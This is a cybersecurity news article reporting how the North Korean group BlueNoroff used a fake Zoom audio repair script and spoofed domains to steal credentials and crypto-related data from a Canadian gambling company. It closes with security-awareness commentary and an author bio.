A Canadian online gambling provider has fallen victim to a highly targeted cyberattack involving a fake Zoom support tool, part of a broader social engineering campaign orchestrated by BlueNoroff, a financially motivated North Korean APT subgroup tied to the Lazarus Group.
Investigators from Field Effect Analysis revealed that the incident began on 28 May 2025, during what appeared to be a routine Zoom call between the victim and a known contact. When audio issues arose, the victim was urged to run a so-called Zoom audio repair script, actually a malicious payload disguised to blend seamlessly into the victim’s workflow.
The attackers had impersonated both the Zoom brand and trusted business contacts using spoofed domains, including the fraudulent zoom-tech[.]us, which had been recently registered and linked to other suspicious infrastructure. The aim: exploit environments where speed and routine dominate, making it easier to bypass scrutiny.
Once executed, the script triggered a chain of downloads and commands. The malware prompted the user to enter system credentials and quietly installed a series of malicious payloads. Persistence was established using macOS LaunchDaemons, with components masquerading as legitimate system processes.
The infostealer malware quickly got to work, exfiltrating sensitive data including system info, keychain credentials, browser profiles, particularly those tied to cryptocurrency usage like Brave—and messaging app data from platforms such as Telegram. Exfiltration occurred using curl commands, with data leaving the victim’s system before the malware was fully embedded.
Javvad Malik, Lead Security Awareness Advocate at KnowBe4, says: “The emergence of this sophisticated social engineering campaign, leveraging the trusted Zoom platform, highlights the ongoing use of legitimate services and brands to social engineer victims.”
He adds that as remote work remains prevalent, organizations must adapt their security strategies to address these evolving threats. “The financial and operational risks posed by such attacks necessitate a proactive approach to cybersecurity, encompassing both technological solutions and human-centric security awareness.
“technology cannot block lookalike websites or services, users should be made aware of these risks and how to identify red flags with tools, and in particular social engineering tactics used to pressure unsuspecting victims into downloading malicious files.”
Malki says if someone does fall victim and downloads a file, local controls should prevent or limit its ability to execute.”
Information Security Buzz News Editor
Kirsten Doyle has been in the technology journalism and editing space for nearly 24 years, during which time she has developed a great love for all aspects of technology, as well as words themselves. Her experience spans B2B tech, with a lot of focus on cybersecurity, cloud, enterprise, digital transformation, and data centre. Her specialties are in news, thought leadership, features, white papers, and PR writing, and she is an experienced editor for both print and online publications.
The opinions expressed in this post belong to the individual contributors and do not necessarily reflect the views of Information Security Buzz.